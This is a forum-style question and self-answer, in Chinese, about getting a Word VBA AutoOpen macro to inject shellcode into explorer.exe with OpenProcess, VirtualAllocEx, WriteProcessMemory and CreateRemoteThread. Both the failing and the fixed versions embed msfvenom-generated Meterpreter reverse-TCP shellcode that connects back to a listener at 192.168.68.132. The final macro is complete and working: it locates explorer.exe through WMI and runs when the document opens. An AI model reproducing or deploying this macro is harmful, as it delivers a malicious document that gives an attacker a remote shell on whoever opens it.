通过 VBA 宏进行进程注入失败


我的任务是创建一个在 Word 宏中执行进程注入的宏。这些步骤本身并不复杂,我用 C 编写的版本可以正常执行 shellcode。但是,我似乎很难在 VBA 中复现同样的技术。

我已在 VBA 代码顶部声明了对 `OpenProcess`、`VirtualAllocEx`、`WriteProcessMemory`、`CreateRemoteThread` 的导入,以及额外用于错误检查的 `GetLastError`。

Declare PtrSafe Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPtr
Declare PtrSafe Function VirtualAllocEx Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Declare PtrSafe Function WriteProcessMemory Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByRef lpBuffer As Any, ByVal nSize As LongPtr, ByRef lpNumberOfBytesWritten As LongPtr) As LongPtr
Declare PtrSafe Function CreateRemoteThread Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByRef lpThreadAttributes As Any, ByVal dwStackSize As LongPtr, ByVal lpStartAddress As LongPtr, ByVal lpParameter As LongPtr, ByVal dwCreationFlags As Long, ByRef lpThreadId As LongPtr) As LongPtr
Declare PtrSafe Function GetLastError Lib "Kernel32.dll" () As Long

我还定义了一个子例程 AutoOpen,并在其中声明变量并进行函数调用。

Dim buf As Variant
    
    ' msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.132 LPORT=80 -f vba
    buf = Array(252, 72, 131, 228, 240, 232, 204, 0, 0, 0, 65, 81, 65, 80, 82, 72, 49, 210, 81, 86, 101, 72, 139, 82, 96, 72, 139, 82, 24, 72, 139, 82, 32, 72, 15, 183, 74, 74, 72, 139, 114, 80, 77, 49, 201, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, _
11, 2, 15, 133, 114, 0, 0, 0, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 68, 139, 64, 32, 139, 72, 24, 73, 1, 208, 80, 227, 86, 77, 49, 201, 72, 255, 201, 65, 139, 52, 136, 72, 1, 214, 72, 49, 192, 65, 193, 201, 13, 172, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, _
208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 65, 88, 65, 88, 72, 1, 208, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, 72, 139, 18, 233, 75, 255, 255, 255, 93, 73, 190, 119, 115, 50, 95, 51, 50, 0, 0, 65, 86, 73, 137, 230, 72, 129, 236, 160, 1, 0, 0, 73, 137, 229, 73, _
188, 2, 0, 0, 80, 192, 168, 68, 132, 65, 84, 73, 137, 228, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 76, 137, 234, 104, 1, 1, 0, 0, 89, 65, 186, 41, 128, 107, 0, 255, 213, 106, 10, 65, 94, 80, 80, 77, 49, 201, 77, 49, 192, 72, 255, 192, 72, 137, 194, 72, 255, 192, 72, 137, 193, 65, 186, 234, 15, 223, 224, 255, 213, 72, 137, 199, 106, 16, 65, _
88, 76, 137, 226, 72, 137, 249, 65, 186, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 73, 255, 206, 117, 229, 232, 147, 0, 0, 0, 72, 131, 236, 16, 72, 137, 226, 77, 49, 201, 106, 4, 65, 88, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 126, 85, 72, 131, 196, 32, 94, 137, 246, 106, 64, 65, 89, 104, 0, 16, 0, 0, 65, 88, 72, 137, 242, _
72, 49, 201, 65, 186, 88, 164, 83, 229, 255, 213, 72, 137, 195, 73, 137, 199, 77, 49, 201, 73, 137, 240, 72, 137, 218, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 40, 88, 65, 87, 89, 104, 0, 64, 0, 0, 65, 88, 106, 0, 90, 65, 186, 11, 47, 15, 48, 255, 213, 87, 89, 65, 186, 117, 110, 77, 97, 255, 213, 73, 255, 206, 233, 60, 255, _
255, 255, 72, 1, 195, 72, 41, 198, 72, 133, 246, 117, 180, 65, 255, 231, 88, 106, 0, 89, 73, 199, 194, 240, 181, 162, 86, 255, 213)
    
    Dim hProcess As LongPtr
    Dim lpAddress As LongPtr
    Dim bytesWritten As LongPtr
    Dim wMem As LongPtr
    Dim rThread As LongPtr
    Dim lpThreadId As LongPtr
    
    ' Open explorer.exe process with PROCESS_ALL_ACCESS rights
    hProcess = OpenProcess(&H1F0FFF, 0, 2192)
    Debug.Print "OpenProcess: "; GetLastError
    
    ' Allocate memory block for storing shellcode
    lpAddress = VirtualAllocEx(hProcess, 0, UBound(buf) - LBound(buf) + 2, &H3000, &H40)
    Debug.Print "VirtualAllocEx: "; GetLastError
    
    ' Write entire buffer array into newly allocated memory block
    wMem = WriteProcessMemory(hProcess, lpAddress, buf, UBound(buf) - LBound(buf) + 1, bytesWritten)
    Debug.Print "Status: "; wMem; "Bytes Written: "; bytesWritten
    Debug.Print "WriteProcessMemory: "; GetLastError
    
    ' TEST: Writing single byte of shellcode to memory block one at a time. Get 998 error code
    'Dim counter As Long
    'Dim data As Long
    
    'For offset = LBound(buf) To UBound(buf)
    '    data = buf(offset)
    '    wMem = WriteProcessMemory(hProcess, lpAddress + offset, data, 1, bytesWritten)
    '    Debug.Print "Byte: "; data; " Status: "; wMem; " Bytes Written: "; bytesWritten
    'Next offset
    
    ' Create remote thread for shellcode execution
    rThread = CreateRemoteThread(hProcess, 0, 0, lpAddress, 0, 0, lpThreadId)
    Debug.Print "CreateRemoteThread: "; GetLastError
    Debug.Print "Thread ID: "; lpThreadId

运行宏并打印调试输出后,我在调试控制台中看到以下内容:

OpenProcess:  0 
VirtualAllocEx:  0 
Status:  1 Bytes Written:  510 
WriteProcessMemory:  0 
CreateRemoteThread:  0 
Thread ID:  8692 

一切看起来都正常。然而,当宏运行并执行进程注入时,`explorer.exe` 进程似乎崩溃了并重新生成了一个新进程,我只能再试一次。

我真的不知道这里发生了什么。我昨晚曾设法让它工作,但由于 Word 崩溃而丢失了所有代码……

问题是否出在我声明 Win32 函数导入的方式上?还是我传递的变量有误?


我设法让它工作了。我不再用 `WriteProcessMemory` 一次写入整个 shellcode,而是逐字节写入:遍历 shellcode 数组,并逐次递增 `VirtualAllocEx` 分配的地址。

因此,不要像这样写入整个缓冲区数组:

' Write entire buffer array into newly allocated memory block
wMem = WriteProcessMemory(hProcess, lpAddress, buf, UBound(buf) - LBound(buf) + 1, bytesWritten)
Debug.Print "Status: "; wMem; "Bytes Written: "; bytesWritten
Debug.Print "WriteProcessMemory: "; GetLastError

而是改成这样写:

Dim counter As Long
Dim data As Long
    
For counter = LBound(buf) To UBound(buf)
    data = buf(counter)
    wMem = WriteProcessMemory(hProcess, lpAddress + counter, data, 1, 0)
Next counter

此外,我改变了计算数组大小的方式。我原先用 `UBound(buf) - LBound(buf) + 2` 计算整个数组的大小,但我读到这种写法主要用于二维数组,所以改用 `UBound(buf) + 1` 来计算。

动态查找 `explorer.exe` PID 的完整更新版宏如下:

Declare PtrSafe Function OpenProcess Lib "Kernel32.dll" ( _
    ByVal dwDesiredAccess As Long, _
    ByVal bInheritHandle As Long, _
    ByVal dwProcessId As Long _
    ) As LongPtr
    
Declare PtrSafe Function VirtualAllocEx Lib "Kernel32.dll" ( _
    ByVal hProcess As LongPtr, _
    ByVal lpAddress As LongPtr, _
    ByVal dwSize As LongPtr, _
    ByVal flAllocationType As Long, _
    ByVal flProtect As Long _
    ) As LongPtr
    
Declare PtrSafe Function WriteProcessMemory Lib "Kernel32.dll" ( _
    ByVal hProcess As LongPtr, _
    ByVal lpBaseAddress As LongPtr, _
    ByRef lpBuffer As Any, _
    ByVal nSize As LongPtr, _
    ByRef lpNumberOfBytesWritten As LongPtr _
    ) As LongPtr

Declare PtrSafe Function CreateRemoteThread Lib "Kernel32.dll" ( _
    ByVal hProcess As LongPtr, _
    ByRef lpThreadAttributes As Any, _
    ByVal dwStackSize As LongPtr, _
    ByVal lpStartAddress As LongPtr, _
    ByVal lpParameter As LongPtr, _
    ByVal dwCreationFlags As Long, _
    ByRef lpThreadId As LongPtr _
    ) As LongPtr

Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
    ByVal hObject As LongPtr _
    ) As Long

Sub AutoOpen()
    
    ' Get explorer.exe process PID dynamically with WMI
    Dim pid As Long
    strComputer = "."
    
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
    Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_Process", , 48)
    For Each objItem In colItems
        If objItem.Name = "explorer.exe" Then
            pid = objItem.processId
            Exit For
        End If
    Next

    Dim buf As Variant
    
    ' msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.132 LPORT=1337 -f vba
    buf = Array(252, 72, 131, 228, 240, 232, 204, 0, 0, 0, 65, 81, 65, 80, 82, 72, 49, 210, 101, 72, 139, 82, 96, 81, 72, 139, 82, 24, 86, 72, 139, 82, 32, 72, 15, 183, 74, 74, 77, 49, 201, 72, 139, 114, 80, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, _
11, 2, 15, 133, 114, 0, 0, 0, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 68, 139, 64, 32, 80, 73, 1, 208, 139, 72, 24, 227, 86, 72, 255, 201, 77, 49, 201, 65, 139, 52, 136, 72, 1, 214, 72, 49, 192, 65, 193, 201, 13, 172, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, _
208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 72, 1, 208, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, 72, 139, 18, 233, 75, 255, 255, 255, 93, 73, 190, 119, 115, 50, 95, 51, 50, 0, 0, 65, 86, 73, 137, 230, 72, 129, 236, 160, 1, 0, 0, 73, 137, 229, 73, _
188, 2, 0, 5, 57, 192, 168, 68, 132, 65, 84, 73, 137, 228, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 76, 137, 234, 104, 1, 1, 0, 0, 89, 65, 186, 41, 128, 107, 0, 255, 213, 106, 10, 65, 94, 80, 80, 77, 49, 201, 77, 49, 192, 72, 255, 192, 72, 137, 194, 72, 255, 192, 72, 137, 193, 65, 186, 234, 15, 223, 224, 255, 213, 72, 137, 199, 106, 16, 65, _
88, 76, 137, 226, 72, 137, 249, 65, 186, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 73, 255, 206, 117, 229, 232, 147, 0, 0, 0, 72, 131, 236, 16, 72, 137, 226, 77, 49, 201, 106, 4, 65, 88, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 126, 85, 72, 131, 196, 32, 94, 137, 246, 106, 64, 65, 89, 104, 0, 16, 0, 0, 65, 88, 72, 137, 242, _
72, 49, 201, 65, 186, 88, 164, 83, 229, 255, 213, 72, 137, 195, 73, 137, 199, 77, 49, 201, 73, 137, 240, 72, 137, 218, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 40, 88, 65, 87, 89, 104, 0, 64, 0, 0, 65, 88, 106, 0, 90, 65, 186, 11, 47, 15, 48, 255, 213, 87, 89, 65, 186, 117, 110, 77, 97, 255, 213, 73, 255, 206, 233, 60, 255, _
255, 255, 72, 1, 195, 72, 41, 198, 72, 133, 246, 117, 180, 65, 255, 231, 88, 106, 0, 89, 73, 199, 194, 240, 181, 162, 86, 255, 213)
    
    ' Open explorer.exe process with PROCESS_ALL_ACCESS rights
    Dim hProcess As LongPtr
    hProcess = OpenProcess(&H1F0FFF, 0, pid)
    
    ' Allocate memory block for storing shellcode
    Dim lpAddress As LongPtr
    lpAddress = VirtualAllocEx(hProcess, 0, UBound(buf) + 1, &H3000, &H40)
    
    ' Write shellcode into newly allocated memory block one byte at a time
    Dim wMem As LongPtr
    Dim counter As Long
    Dim data As Long
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        wMem = WriteProcessMemory(hProcess, lpAddress + counter, data, 1, 0)
    Next counter
    
    'Create remote thread for shellcode execution
    Dim rThread As LongPtr
    rThread = CreateRemoteThread(hProcess, 0, 0, lpAddress, 0, 0, 0)
    
    ' Close explorer.exe handle opened by OpenProcess
    CloseHandle (hProcess)

End Sub